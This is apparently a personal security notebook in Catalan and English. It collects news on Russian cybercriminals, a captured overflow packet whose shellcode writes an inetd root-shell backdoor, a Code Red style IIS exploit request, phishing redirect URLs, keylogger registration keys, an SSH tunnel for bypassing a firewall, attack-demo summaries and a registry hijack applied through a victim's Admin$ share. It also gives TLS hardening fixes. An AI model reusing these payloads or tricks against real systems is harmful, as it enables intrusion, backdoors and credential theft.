Els russos
Evgeniy Bogachev
The biggest new threat to America's banking system was Evgeniy Bogachev, a hacking mastermind who was thought to be running the most sophisticated cybercrime network the world has ever seen from his home on Russia's Black Sea coast, "Anapa" resort. His face appeared on the FBI "most wanted" page this summer and the total haul for his cyber crimes was estimated at more than $100 million. Starting in September of 2011, the FBI began investigating a modified version of the Zeus Trojan, known as Gameover Zeus (GOZ). It is believed GOZ is responsible for more than one million computer infections, resulting in financial losses in the hundreds of millions of dollars Read Wired, 201703 [*****] Peter Severa, Pyotr Levashov
Jul. 29, 2017 4:54 AM ET
MOSCOW (AP) — From the early days of online stock scams to the increasingly sophisticated world of botnets,
pseudonymous hacker Peter Severa spent nearly two decades at the forefront of Russian cybercrime.
Now that a man alleged to be the pioneering spam lord, Pytor Levashov, is in Spanish custody awaiting extradition to the U.S.,
friends and foes alike are describing the 36-year-old as an ambitious operator who helped make the internet underground what it is today.
"Levashov is a pioneer who started his career when cybercrime as we know it today did not even exist," Tillmann Werner,
the head of technical analysis at U.S. cybersecurity company CrowdStrike, said.
"He has significantly contributed to the professionalization of cybercrime," said Werner,
who has tracked the alleged hacker for years. "There are only very few known criminals that had a similar level of influence and reputation."
Satter reported from Paris. Nataliya Vasilyeva in Moscow and Diego Torres in Madrid contributed to this report. Pyotr Levashov
One of the world’s most notorious spammers appears to have been tripped up by a basic cybersecurity no-no, according to the FBI: he used the same log-in credentials to both run his criminal enterprise and also log into sites like iTunes. The Justice Department announced Monday that it had successfully targeted a man prosecutors called “one of the world’s most notorious criminal spammers,” a Russian hacker known as Peter Yuryevich Levashov, also known as Peter Severa, or “Peter of the North.” Levashov had long run the Kelihos botnet, a global network of infected computers that collectively flooded email inboxes worldwide with spam, stole banking credentials from infected users, and spread malware across the internet.
Ransomware és un programari maliciós que fa inaccessibles els arxius dels ordinadors.
Sous
Eines
Windows & Microsoft
Pagaments
Krack intodtspcDescribed here : internal buffer is 4k (0x1000), but request sets length to 0x103e - see packet 580 :
0040 7a d2 30 30 30 30 30 30 30 32 30 34 31 30 33 65 z.000000 0204103e
The buffer overflow gives control to this code :
0490 80 1c 40 11 80 1c 40 11 80 1c 40 11 80 1c 40 11 ..@...@. ..@...@.
04a0 80 1c 40 11 80 1c 40 11 80 1c 40 11 80 1c 40 11 ..@...@. ..@...@.
04b0 80 1c 40 11 80 1c 40 11 80 1c 40 11 20 bf ff ff ..@...@. ..@. ...
04c0 20 bf ff ff 7f ff ff ff 90 03 e0 34 92 23 e0 20 ....... ...4.#.
04d0 a2 02 20 0c a4 02 20 10 c0 2a 20 08 c0 2a 20 0e .. ... . .* ..* .
04e0 d0 23 ff e0 e2 23 ff e4 e4 23 ff e8 c0 23 ff ec .#...#.. .#...#..
04f0 82 10 20 0b 91 d0 20 08 2f 62 69 6e 2f 6b 73 68 .. ... . /bin/ksh
0500 20 20 20 20 2d 63 20 20 65 63 68 6f 20 22 69 6e -c echo "in
0510 67 72 65 73 6c 6f 63 6b 20 73 74 72 65 61 6d 20 greslock stream
0520 74 63 70 20 6e 6f 77 61 69 74 20 72 6f 6f 74 20 tcp nowa it root
0530 2f 62 69 6e 2f 73 68 20 73 68 20 2d 69 22 3e 2f /bin/sh sh -i">/
0540 74 6d 70 2f 78 3b 2f 75 73 72 2f 73 62 69 6e 2f tmp/x;/u sr/sbin/
0550 69 6e 65 74 64 20 2d 73 20 2f 74 6d 70 2f 78 3b inetd -s /tmp/x;
0560 73 6c 65 65 70 20 31 30 3b 2f 62 69 6e 2f 72 6d sleep 10 ;/bin/rm
0570 20 2d 66 20 2f 74 6d 70 2f 78 20 41 41 41 41 41 -f /tmp /x AAAAA
0580 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAA AAAAAAAA
0590 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAA AAAAAAAA
05a0 41 41 41 41 41 41 41 41 AAAAAAAA
IPC$ using port 139Herecmd.exe
GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%ubcaf%u77e3%u0000%u0000%u838b%u0094%u0000%u408b
%u0564%u0150%u0000%ue0ff%u9090=x&
r
p
Z!ffffZ
q
PnHek7
&cmd.exe$ HTTP/1.1
Host: 172.16.134.191:80
GET / HTTP/1.0
From
here,
explained
here
Nomenclatura
A bot is an automated client that is remotely controlled via a network.
A set of related bots collectively comprise
a distributed communication network called a botnet.
Botnets are most commonly used for
distributed denial of service (DDoS) attacks, flooding, etc.
Security under Linux :
Review here [F. Perez] Generació de clausEines
Velocitat Symbol set [36] : 0123456789abcdefghijklmnopqrstuvwxyz
4 symbols => 1.679.616 combinacions [ 36 exp 4 ]
8 symbols => 2.821.109.907.456 combinacions [ 36 exp 8 ]
P4 : 35.000 kis/sg
AnathemaURLThe upper reaches of the network are a "darknet," hidden behind layers of security. The sites use a "bounce" to hide their IP address, and members can log in only from trusted IP addresses already on file. WS_FTPWS_FTP offers the facility to store their ftp password to remote systems. It keeps this information in ws_ftp.ini, a little obfuscated. Want to see keys ? Enter PWD here ! Mine !! KBD loggerKGBA mi m'agrada el "KGB Key Logger". Tinc la versio "KGB Spy 3.32". Haig de buscar la "Registration Key" 1.368.677 freekgbkeylogger_151.zip
1.421.406 kgbkeylogger-23_3days.zip -> versio 2.31 !
La URL es Refog, i s'activa amb CTRL + SHIFT + ALT + "K" Detected by SAv. ActualSpyHotKey = Shift + Control + Alt + F8 V 2.9 registration key = "". Family Keylogger v 2.83HotKey = Control + Alt + Shift + "F" (restores Try icon ...) : url. Compte : detected by SAV ... SpyArsenal.com Fix : lxt_fk283.exe KeySpy
Run setupv791.exe (cd3eines) and follow instructions.
Registration Key: 35B42C8F
\\T42\FONTS\KbdLog\setupv791.exe 435.712
Runs under W95 ! Writes file KeySpy.log, in c:\WINDOWS\SYSTEM32 directory. To read the encrypted Log, use SETUPV791 again ! (with Password) Displays as T30:e:\kbds\SetupIP.exe, T42: \\fonts\kbdlog\wkfymgr.exe, Web Browser forensicsOrigin URL. IE activity : C:\Documents and Settings\username\Local Settings\Temporary Internet Files\Content.IE5\ The Index.dat file contains the Internet activity for each information store. Internet history activity without locally cached web content : C:\Documents and Settings\username\Local Settings\History\History.IE5\ Cokies file for IE : C:\Documents and Settings\username\Cookies\Index.dat format whitepaper. Firefox files are located in the following directory: \Documents and Settings\<user name>\Application Data\Firefox\Profiles\<random text>\history.dat Mozilla/Netscape history files are found in the following directory: \Documents and Settings\<user name>\Application Data\Mozilla\Profiles\<profile name>\<random text>\history.dat Tools :
StormWorm, Dorf, EcardWired, SecureWorks, eWeek,Storm Worm More Powerful Than Top Supercomputers url RootKitsRootkitRevealer works by comparing a high-level scan of the system via the Windows API with a low-level direct scan of file system and Registry on-disk structures. Rootkits that cloak by modifying a system view at any level above the on-disk structures will be visible as discrepancies between the two scans - that is, if their cloaking is active. PhiShingNetcraft says (17/05/2005) :
http://cgi4.ebay.com/ws/eBayISAPI.dll?MfcISAPICommand=RedirectToDomain&
DomainUrl=http%3A%2F%2F%32%31%31%2E%31%37%32%2E%39%36%2E%37%2F
UpdateCenter%2FLogin%2F%3FMfcISAPISession%3DAAJbaQqzeHAAeMWZlHhlWXS2AlB
XVShqAhQRfhgTDrferHCURstpAisNRqAhQRfhgTDrferHCURstpAisNRpAisNRqAhQRfhgTDr
ferHCUQRfqzeHAAeMWZlHhlWXh
At a casual glance, this URL would appear to be genuine and one
would certainly expect it to display a page belonging to eBay.
However, the function of this page was to redirect to a different URL
that could be embedded within the eBay URL.
Because this page allowed redirection to arbitrary URLs,
a fraudster exploited this weakness by sending out many mails
asking people to visit this URL to update their eBay account details.
When a user clicked on the link,
they were redirected to a phishing site at http://211.172.96.7/UpdateCenter/Login/.
The IP address in the original URL was deliberately obfuscated by the fraudster to make it look less suspicious.
Another recent attack saw fraudsters exploiting an identical vulnerability on the Visa web site:
http://usa.visa.com/track/dyredir.jsp?rDirl=http://200.251.251.10/.verified/
The URL redirected users to a phishing site hosted at http://200.251.251.10/.verified/,
and used a common browser vulnerability to spoof the real URL in the address bar.
While cross site scripting and open redirects are both attractive to fraudsters,
open redirects are - if anything - more pervasive and even easier for fraudsters to locate and exploit.
Netcraft now provides a service to detect these and offer advice
to banking and financial sites to reduce their level of fraud facilitation.
05/2005 : at Gmail I get a mail asking to click on this link : http://www.deutsche-bank.de/QKZoaOS9sFX4cM3VsXVhKD1B0XvMsmypGSVbdP2FIeynDRpZJ37c2e5n6w1h2k6mq that reverts to : http://www.google.fm/url?q= http://go.msn.com/HML/6/9.asp?target=http://i0d98s%093%%.D%%%09A%09.%09R%%U/ that is read as http://i0d98s3.DA.RU/ Pharming, o desencaminamentEs modifica la resolucio de noms de domini, per dirigir l'internauta cap a una pàgina web fraudulenta. L'usuari perd el bon camí en ser encaminat, sense que se n'adoni. Concurs(os)Al host fesinternet2005.xifra.net (-) que té la IP 213.201.61.146 (-) s'ofereixen 12.000 € per llegir el fitxer anduril.txt ... Nov 2006 : PS3 Hacking Contest FedExurlAccording to the report, written by Strom Carlson at Secure Science in San Diego, data stored on the cards is not encrypted and can be viewed by anyone with a smart-card reader. Data on the card can also be modified with a three-byte-long security code. As part of his research, Carlson purchased a Kinko's card for $1 and then wired it to a USB logic analyzer that sniffed the secret code from the card as it interacted with the kiosk. The three-digit code was unencrypted and easy to spot from the data passed back and forth between card and reader, he said. In a video that demonstrates the hack, Carlson used a secure card reader connected to a laptop to modify the dollar amount on the card from $1 to $50 and change the serial number of the card. He then redeemed $.20 from the modified card from a Kinko's computer terminal and printed out a receipt for the activity that shows the modified ExpressPay serial number and an adjusted balance of $49.80 on the card. XP Security Checklist (3 levels)urlXP Security ToolsurlDo ScanTry Telnet, Satan, Nmap, ... on www.x**xabcn.net [195.77.120.54] PatchGuard
Introduction
Implementation
At a high-level, PatchGuard is implemented in the form of a set of routines that cache known-good copies and/or checksums of structures which are then validated at certain random time intervals (roughly every 5 - 10 minutes). The reason PatchGuard is implemented in a polling fashion rather than in an event-driven or hardware-backed fashion is because there is no native hardware level support for the things that PatchGuard is attempting to accomplish. For that reason, a number of the tricks that PatchGuard resorted to were done so out of necessity. The team that worked on PatchGuard was admittedly very clever. They realized the limitations of implementing an anti-patching model in a fashion described in the introduction and thus were forced to resort to other means by which they might augment the protection mechanisms. In particular, PatchGuard makes extensive use of security through obscurity by using tactics like misdirection, misnamed functions, and general code obfuscation. While many would argue that security through obscurity adds nothing, the authors believe that it's merely a matter of raising the bar high enough so as to eliminate a significant number of people from being able to completely understand something. The code to initialize PatchGuard begins early on in the boot process as part of nt!KeInitSystem. The diagram in figure [*] shows roughly where in the boot process it's initialized. [...] The demise of CSS hacks and broken pagesKrakHow to crack an old UE-32
Tool : using BRW, the "magical" Borland Resource Workshop, a mighty tool.
Power at your fingers !
SSH
SSH is a great way to proxy your connection through a network without being stopped. You just load up your ssh client, connect to your external host with the web proxy server (serving only localhost traffic) and you port forward your connection and poof, you're now bypassing anything you like. It's really practical for when you are going out to a customer premise and you need to connect outbound but everything under the sun is blocked. Maybe even outbound port 22 is blocked, but if you put your external SSH port on port 80 you can walk right through those primitive network defenses. Tunneling tutorial
Programs needed to run this demonstration:
.-----------. ( .--------------------.
| site (a) | ( | site (b) |
| Koltrane |-------( [firewall] ---| T42 |
| free zone | ( | restricted zone |
.-----------. ( .--------------------.
Step 1 (a) : Acquire an SSH service outside of the firewalled network. ( install OpenSSH on Windows @ site-a )
At this point you should have an SSH connection outside of the firewalled network. Step 2 (b) : Download Putty to a directory on your computer. Step 3 (b) : "shunnel.bat" in the same directory as Putty = putty -D 1080 -P 443 -ssh your.domain.com/homeIP
To set up SOCKS-based dynamic port forwarding on a local port, use the -D option. -D [listen-IP:]listen-port
Dynamic SOCKS-based port forwarding
The -P option is used to specify the port number to connect to.
"your.domain.com" is the domain name of the computer
outside the firewalled network that your SSH service is hosted on.
It can also be the machine's IP address.
Step 4 (b) : Create your tunnel At work, simply double click shunnel.bat to initiate the shunnel. Step 5 (b) : Configure IE and Firefox Internet Options + Internet Properties + Connections + LAN settings + Proxy Server + Advanced
Clear all lines, except "Socks", that has to be 127.0.0.1 : 1080 - uncheck "Use the same proxy server for all protocols"
url, better url ! It works with anything that allows a Socks4 or Socks5 configuration. Simply, configure the SOCKS settings to point to the IP address 127.0.0.1 and whatever port you have specified in your .bat file.
You can use WinSCP to do remote editing over ssh.
Another SSH client is ssh.exe ! .-------------------.
| HP |) 22 --- [zyxel] --- ( Interne )
| IP = 192.168.1.38 | IP ?
.-------------------.
Default Config Files and SSH Port
Top 20 OpenSSH Server Best Security Practices
More
VPN
Server @ I95.75.94.7 Your network is PWNED !
The session objectives are to expose common security threats, learn from other people's mistakes, and motivate us to implement the correct security controls. DEMO 1 - What is the easiest way to break in without risking personal exposure? A trojan. Firewalls prevent old-school trojans (listening on a port for an inbound connection). XXXXX, written by a Turkish hacker, allows the creation of trojan programs - it is just one of many. It allows injection into IE and common application naming (it will run as svchost.exe). Further, it can disable common firewalls and antivirus programs. You can bind it to known and trusted applications and then email it out to unsuspecting people - like CEOs or Marketing. Once run on a client PC you can connect to it an grab all of its files - you can grab hashes. It can upload screen viewing software and patch itself. Once done, the attacker can cover their steps by killing the server on the way out the door. This is an important demo because 70% of the computers in the world are infected by malware. DEMO 2 - This is an exploit attack because the client is vulnerable to a known software problem. This demo was done with the XXXXX tool that is expensive to buy and is professional grade. XXXXX allows you attack known software issues. After sending the attack URL, via email, to the client the software goes into listening mode. When you click on the link the browser dies but really an agent has been installed behind the scenes. All this because the user did not patch their software. DEMO 3 - This is a Web/SQL Injection attack. This demo assumes a DMZ web server attached to a SQL server on the internal network. It used the Foundstone Hacme Bank application (used for training) to demonstrate hacking a website based on SQL. SQL, these days, has a lot of commands that don't relate solely to data storage (e.g. xp_cmdshell). Using an injection attack Marcus was able to upload some hacking tools (in UUEncode so that the SQL box would take it). After the uploads, he had the command shell re-encode the uuencoded files so they could be run. He recompiled netcat and started it back up. Running an additional command he has netcat bring up a command prompt. You can discover your privilege by running a whoami. The solution for these attacks includes input validation, hardening the server, etc. DEMO 4 - A wireless attack (don't admit that you use WEP - your company name is on your badge). This attack used XXXXX to capture traffic for three days. The problem is WEP is the encryption algorithm. Each ID packet exposes a bit of the WEP key. It takes 5 minutes to break 128 bit WEP. Don't use WEP. WPA is a lot better but not foolproof. XXXXX is the GUI version and it can be used to attack WPA-PSK. Easy to guess keys are not that hard to compromise with the right tools. Don't use common words as the tools can compromise them. XXXXX from XXXXXX allows you to compromise the WPA key on a PC. You don't need to crack the key - just compromise one of the clients. Think about putting your wireless network outside of the company. DEMO 5 - A physical attack can be pulled off not due to skill but due to people being nice. Watch out for wireless AP placement in your facility. A USB U3 device can be placed on a device inside the company to dump user names and encrypted password hashes (local and maybe domain if there is a domain account logged in). Don't ever plug someone else's USB device into your PC. Most common attack today is the use the wireless cards built-in to the laptop. Hackers will setup a known network in the parking lot and laptops will connect to it. Hackers could then allow you to surf through them. DEMO 6 - First thing you would want to do is scan the network with a tool like nmap. This will allow you to locate your DCs, file servers, clients, etc. Once you own a PC run XXXXX and it will allow you to dump the passwords on the box that you own. It would give you the password for any shared account on the PC. (Don't let your PC's local account be the same as every PC in the network. Make sure to role-base your clients and harden the ones that are management clients. Make sure to use client firewalls - why should a client be able to connect to a client.) Using a runas variant you can UNC to another PC and inject the password hash directly so that you do not need a password. XXXXX is a non-public tool that allows this injection. This allows you to log on to a remote PC without a password but with a hash. If you run as a domain admin the hacker can use nmap to find your DC, then use a hash injection tool to control your domain controller. Once in, the hacker would dump the passwords on the domain controller (using psexec to copy XXXXX to the DC and then using XXXXX from the DC). If you share accounts between computers the compromise of one leads to the compromise of all. DEMO 7 - This is a man-in-the-middle attack and simulates what would happen if a hacker came in over wireless. What the attacker needs to do is to sniff the traffic. This demo was done in attacking the ARP protocol. He will begin to build a table of MAC addresses to IP addresses. Using XXXXX you can do an ARP lookup and scan for MAC addresses on the network. From that you can do ARP spoofing and poison the traffic. With this attack running you can examine everything in the RDP session. This includes the keys that were pressed (password), thereby giving away the entire account and password. Without owning a PC on the network ARP poisoning allows the compromise of the domain. (Make sure to use the new terminal services client with certificates. Do it now.) Countermeasures
Gmail attack
The attack is actually quite simple. First Graham needs to be able to sniff data packets and in our case the open Wi-Fi network at the convention fulfilled that requirement. He then ran Ferret to copy all the cookies flying through the air. Finally, Graham cloned those cookies into his browser - in easy point-and-click fashion - with a home-grown tool called Hamster. He added that the Hamster tool will be released in the next few days. Ariane Flight 501 failure (Ada code)
There was indeed a chain of events that doomed the flight: an out-of-range data condition in a calculation that wasn't even needed, the by-design throwing of an uncaught exception, and the automatic shutdown of the launch vehicle's active and backup inertial reference systems. As the result of the unanticipated failure mode and a diagnostic message erroneously treated as data, the guidance system ordered violent attitude correction. The ensuing disintegration of the over-stressed vehicle triggered the pyrotechnic destruction of the launcher and its payload. How to extract data from victim system
Home computers and 500GB IOMEGA
Al 500 GB hi ha : ISOs
VMs
SalvaPCs {ghost & vmware}
PICs
T42 {raw copy}
Copies que tenim :
IOMEGA:\SalvaPCs\ | xCopy {ghost} {vmConverter} {AV}
-------------------.---- ------------- ------------------- --------------------------------- --------
T42 | nov09 . . .
|
P4_Airis | . 154.234.650.624 P4_Maig_2008.vmdk {6h} 12/dec/2009
|
Nicolau_RAP | . . .
| 200608, 20 GB, 46 min .
| C_Drive.v2i .
Arcadi_HP | . . .
| 1.919 ARKADI-PC.sv2i .
| 14.746.124.288 C_Drive.v2i .
Irina_Acer | . . .
| . .
| . .
Home computers and security audit
I'd suggest :
Smily terror
Windows stores for .exe files a registry key which specifies what to do with a ".exe" file. It is located at HKEY_CLASSES_ROOT\exefile\shell\open\command and normally contains the value "%1" %* which just means: do what the first parameter specifies and pass the rest of the parameters as new parameters. As you may know, the first parameter is the full name of the .exe file to be executed. And here we start with our nasty trick. We redirect the command line to our "application". We do this by modifying the registry key:
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"aelaunch.exe\" %1 %*"
Now you may wonder how this will annoy anyone? Remember a default share called Admin$? And do you remember that RegEdit can connect to other machines? Bingo, just copy the executable to your victim's Admin$\system32 directory, run RegEdit and modify the registry of the victim's machine. Here you go... Some security threads and how to fix them
High severity ;
Medium severity:
Low severity :
SSL certificate chain contains RSA keys less than 2048 bits - how to fix it
Info : at least one of the X.509 certificates sent by the remote host has a key that is shorter than 2048 bits. General fix : replace the certificate in the chain with the RSA key less than 2048 bits in length with a longer key. To verify that the new certificate is in place, view the certificate in your web browser. The Server Public Key information will show you the bit length. How to view certificates Internal site for free certificate generation SSL 2 and 3 detected - how to fix it
Summary: The SSLv2 (Secure Socket Layer version 2) and/or SSLv3 service is running.
Info:
The Secure Socket Layer (SSL) protocol allows for secure communication between a client and a server.
NIST has determined SSL v3.0 is no longer acceptable for secure communications, in large part due to 2014's POODLE vulnerability. As of the date of enforcement found in PCI DSS v3.1, any version of SSL will not meet the PCI SSC's definition of "strong cryptography". See also :
General fix
Configure the server to disable SSLv2 and SSLv3 and enable TLS (preferably v1.2). As usual with configuration changes, it will be necessary to restart the affected services. You can use the following openssl command to verify if an SSLv2 connection is successful (change to -ssl3 for SSLv3): $ openssl s_client -connect <IP Address>:<port> -ssl2
SMTP services will need to add the relevant STARTTLS options: # openssl s_client -starttls smtp -connect <ip address>:<port> -ssl2
There are also websites that enable users to test servers on the Internet, such as http://foundeo.com/products/iis-weak-ssl-ciphers/test.cfm Server owners can also use ScanOnDemand. Apache
For Apache/mod_ssl, ensure that httpd.conf or ssl.conf has the following directive for each SSL enabled server.
The old style Apache/apache_ssl is very outdated and should no longer be in use. SSH errors and Chrome
Chrome de vegades diu ERR_SSL_FALLBACK_BEYOND_MINIMUM_VERSION
Una putada és el error ERR_SSL_VERSION_OR_CIPHER_MISMATCH
Ara resulta que no puc accedir a la Nano-5 ! Explicació Due to POODLE, Google has disabled SSLv3 in Chrome starting from version 40. Firefox has followed the suit and disabled the SSLv3 since version 34. Solucio: old Firefox & disable upgrades ! 32.0.3 +
Menu btn > Options icon > "Update" tab > "Never check for updates"
Or edit %APPDATA%\Mozilla\Firefox\Profiles\user.js and add the following, save and close, restart Firefox (prefs.js ?)
user_pref("app.update.enabled", false); // turn off application updates
Best explanation here ! Cant click "Add Exception" ?
Que nassos -es "ERR_NETWORK_CHANGED" ? They use "peer flooding" to slow down utorrent/bittorrent. Chrome 68 Juliol 2018
Desde el mes de julio, url, Chrome 68 marcará como «no seguras» todas las páginas que no estén protegidas por un certificado SSL, y las consecuencias pueden ser graves. Un estudio reveló que el 87 % de los usuarios abandonan la transacción si el navegador muestra un mensaje de advertencia. Dark web
Tor browser - download 5.0.7 (20160105), 42 MB Not accepted by chess.com, does not work at chess24.com (disconnect loop) Login monitoring
Ens convé mirar si hi ha "atacs" de login() a la nostra màquina :
$ sudo tail -f /var/log/auth.log
LinuxMint incident (201602)
The addresses the malware was connecting to were either shut down or blocked by Kaspersky's DNS sinkhole. Spread This Number * 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 *
JavScript code injection
One of the most common insecurities on the client side is HTML injection, whereby an application may unknowingly allow third parties to inject JavaScript into its security context. Today, websites and many web applications need some sort of client-side encryption. Especially since browsers remain the tool of choice when interacting with remote servers. URI phishing
Uniform Resource Indicators (URI) are a compact string of characters for identifying an abstract or physical resource, typically a web based Uniform Resource Locator (URL). Henning Klevjer descr. Attacks description [****], test page for homograph attack url : The xn-- prefix is what is known as an "ASCII compatible encoding" prefix. It lets the browser know that the domain uses "punycode" encoding to represent Unicode characters. Overview of Cybench CTF Challenges
Cybench CTF challenges consist of 40 professional-level Capture the Flag (CTF) tasks designed to evaluate the cybersecurity capabilities of language models. These tasks are structured to assess how effectively models can identify and exploit vulnerabilities in various cybersecurity domains. Domains Covered - the challenges span multiple domains, including:
Domain Description
Cryptography Tasks related to cryptographic protocols and primitives.
Web Security Challenges focused on vulnerabilities in web applications.
Reverse Engineering Tasks that require analyzing and deconstructing software.
Forensics Challenges involving data recovery and analysis.
Exploitation (Pwn) Tasks that test the ability to exploit software vulnerabilities.
Miscellaneous A variety of other cybersecurity-related challenges.
Whatsapp
Messages on WhatsApp were left open to potential attackers for years, as detailed in recent leaks about Boldend – a US cyber-warfare startup – more here Since the creation of WhatsApp, there's hardly been a moment in which it was secure: every few months researchers uncover a new security issue in the app. I wrote about this in detail 2 years ago - read here if you missed it. Nothing has changed since then. It would be hard to believe that the technical team of WhatsApp is so consistently incompetent. Telegram, a far more sophisticated app, has never had security issues of such severity. NSO Group
Israeli spyware dealer NSO Group is facing renewed scrutiny over the abuse of its WhatsApp hacking tools.
The software, Pegasus, is widely regarded as the world’s most potent spyware, capable of reliably cracking the encrypted communications of iPhone and Android smartphones. Boldend
Boldend was reported to have developed a capability to hack WhatsApp. Boldend was backed by Founders Fund, the investment vehicle of Peter Thiel, one of Facebook’s best-known financial backers. Google Chrome zero-day vulnerability
The vulnerability in question, CVE-2022-1364, is another 'Type Confusion in V8' one. The emergency update takes Chrome to version 100.0.4896.127 Privacitat ?
Few names
Links
|